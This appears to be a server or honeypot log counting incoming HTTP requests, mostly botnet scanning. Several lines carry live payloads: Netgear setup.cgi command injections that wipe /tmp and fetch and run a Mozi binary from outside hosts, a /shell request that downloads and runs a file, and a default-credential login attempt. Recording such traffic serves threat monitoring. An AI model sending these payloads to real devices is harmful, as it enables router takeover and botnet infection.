1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/exactarget/`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]40[.]88[.]117:44085/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+6o1;wget+http:/\\/179.43.175.5/6o1;chmod+777+6o1;./6o1;sh+6o1`	HTTP/1.1
3	GET	`/solr/`	HTTP/1.1
1	GET	`http[:]//212[.]47[.]250[.]14:80/index.php`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	PRI	`*`	HTTP/2.0